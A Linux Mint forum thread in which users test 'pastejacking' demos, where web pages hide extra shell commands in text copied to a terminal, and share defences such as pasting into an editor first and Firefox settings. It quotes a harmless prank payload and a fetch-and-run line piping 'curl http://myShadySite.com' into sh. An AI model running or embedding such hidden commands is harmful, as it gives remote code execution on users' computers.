Possible Exploit with Copy/Paste to Terminal?

[D Canard]

Here, perhaps, is an object lesson in the dangers of laziness when working with BASH or PowerShell or other terminal environments.

Command line stuff is often complicated and it is easy to make typos that are hard to see if you are tired, stressed and/or inexperienced, so people often copy commands from websites that offer instructions on how to do or fix something.

This copy/pasting of commands apparently can be exploited.

A techie friend, who brought this to my attentions, has tested the (non-dangerous, not run as root) exploit demo outlined in the link below on his Android phone, and it works for him.

http://lifepluslinux.blogspot.com/2017/ ... te-to.html

This is cool in a worrisome sort of way. But I am pleased to say it doesn't work in my terminal on Linux Mint 20 copying from Vivaldi. I just get the normal output I would get from running ls -lat.

It I copy/paste the selection from the website into a text only app or paste without formatting into a word-processor app, I just get the text, ls-lat.

If I inspect the element, ls -lat, in the web page with Vivaldi's dev-tools, I can see that something is very wrong, but what is wrong seems not to copy/paste over.

Notwithstanding, I do copy/paste of command line code all the time. I guess I shouldn't be so lazy.

[xenopeek]

I tried both in Firefox and Chromium but neither copies invisible text so only the also in the browser visible "ls -lat" text is copied. I had to remove the "malicious" class from the span with the hidden text on the webpage to make it visible to be able to copy the (no longer) hidden text from Firefox or Chromium. Gnome Web did copy the text without having to make it visible.

I use Tilix as terminal and it prompted me with a warning when pasting the copied text with the malicious part in it:


Gnome Terminal just ran it. I guess Gnome Web and Gnome Terminal could do with some improvement.

[Flemur]

I just get ls -lat in two terminals, two browsers and leafpad. I pasted it into leafpad, saved it as ls.txt, and then

Code: Select all

$ od -a ls.txt
0000000   l   s  sp   -   l   a   t
0000007

[MrEen]

Interesting.

I selected the text in Brave, and on right click I have the option to "Search Google for "ls;clear..." etc, but when choosing Copy, it only copied the ls -lat.

[Termy]

There is nothing between ls and -lat for me, but I don't just allow every site script access. This is definitely worrisome though, if this is somehow catching people out. As if copy-pasting weren't problematic enough already.

BTW, the commands it was supposed to run are:

Code: Select all

; clear; echo 'Haha! You gave me access to your computer with sudo!';
echo -ne 'h4cking ##                        (10%)\r';
sleep 0.3;
echo -ne 'h4cking ###                       (20%)\r';
sleep 0.3;
echo -ne 'h4cking #####                     (33%)\r';
sleep 0.3;
echo -ne 'h4cking #######                   (40%)\r';
sleep 0.3;
echo -ne 'h4cking ##########                (50%)\r';
sleep 0.3;
echo -ne 'h4cking #############             (66%)\r';
sleep 0.3;
echo -ne 'h4cking #####################     (99%)\r';
sleep 0.3;
echo -ne 'h4cking #######################   (100%)\r';
echo -ne '\n'; 
echo 'Hacking complete.';
echo 'Use GUI interface using visual basic to track my IP'<br /> ls

I got it from the page's source.

I suppose you can avoid something like this catching you out by pasting first in an editor. That said, not everyone will understand what they're looking at.

[BenTrabetere]

The exploit did not work for me with Firefox and Gnome Terminal. I just got output from ls -lat.

The article claims, "This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too."

Please correct me if I am wrong, but if this was an exploit and it the command had sudo, you would still have to enter your password in order for the command to work. Yes? (It upsets me to think that too many people would enter a password without hesitation.)

@Termy
+1 for pasting commands to a text editor before pasting to a terminal. I have been doing that for several years.

[xenopeek]

if this was an exploit and it the command had sudo, you would still have to enter your password

Yes.

[mmphosis]

One of the many things that I turn off in the Firefox about:config

dom.event.clipboardevents.enabled

https://briantracy.xyz/writing/copy-paste-shell.html

[Termy]

dom.event.clipboardevents.enabled

Very nice! I'm going to incorporate a check for that into UbuChk. I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?

Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?

[xenopeek]

https://briantracy.xyz/writing/copy-paste-shell.html

dom.event.clipboardevents.enabled is 'true' in my Firefox so I would expect that website to do something scary but it doesn't?

When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"

But on the terminal it again only pastes the visible text: echo "looks safe to me!". And it also prints "looks safe to me!" and nothing more.

[Termy]

But on the terminal it again only pastes the visible text: echo "looks safe to me!". And it also prints "looks safe to me!" and nothing more.

Do you have scripting allowed for the page? You might actually have some other feature in place in your browser to protect against this. I use NoScript which blocks scripts unless I allow it.

[xenopeek]

As I shared, it does change the copied text when pasting here:

When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"

[Termy]

Oh yeah -- my bad. I misread.

[mmphosis]

dom.event.clipboardevents.enabled

Very nice! I'm going to incorporate a check for that into UbuChk. I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?

Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?

Cool perl script project! The whole "Firefox about:config" is a topic onto itself. I have a about 10 preferences set to false (unless otherwise specified) for personal preference and added security/privacy:

browser.backspace_action=2
geo.enabled
extensions.pocket.enabled
network.http.sendRefererHeader=0
browser.newtabpage.enabled
browser.urlbar.trimURLs
keyword.enabled
browser.fixup.alternate.enabled
media.autoplay.enabled

Here is a reference for many many more: https://github.com/arkenfox/user.js/blob/master/user.js

I also install uBlock Origin and uMatrix.

I use TenFourFox a Firefox-based browser for PowerPC Mac and the settings work the same as Firefox on Linux Mint. Some setting types change with newer and older versions of Firefox.

[Termy]

...

Thank you muchly! I'll look into all of those. Very cool stuff.

Update:

From looking into this a bit and actually starting to add it to UbuChk, I've ran into some walls. Firefox does NOT make this process easy. Might make a thread for this, to see if anyone has managed to do this successfully, plus I don't want to derail this thread. It might just not be viable for UbuChk, sadly.

Done, in-case anyone is curious: viewtopic.php?f=213&t=341311

[FreedomTruth]

if this was an exploit and it the command had sudo, you would still have to enter your password

Yes.

I realize I'm posting a month late to the discussion, but this may still be helpful to point out.
One thing about "sudo" use is that once you successfully use sudo in a terminal, you do not need to reenter your password to use it again for a set time (5 minutes?). Thus, if a user had recently run a sudo command, and then blindly pasted a malicious sudo command, it *could* run without re-asking for the password.

[Termy]

Yeah -- the password (credentials, specifically) is cached for 15 minutes, by default; this is mentioned in the sudo(8) manual page. This can be adjusted, however, to be as long or short as you like, by editing the '/etc/sudoers' file. Look at the sudoers(5) manual page for information on how to change this: man sudoers

[xenopeek]

You can run sudo -k to reset that timer so next sudo command will ask the password again. Also, the timer is per session: if you open a new terminal, or a new tab in your terminal, the first sudo command on that will always ask the password.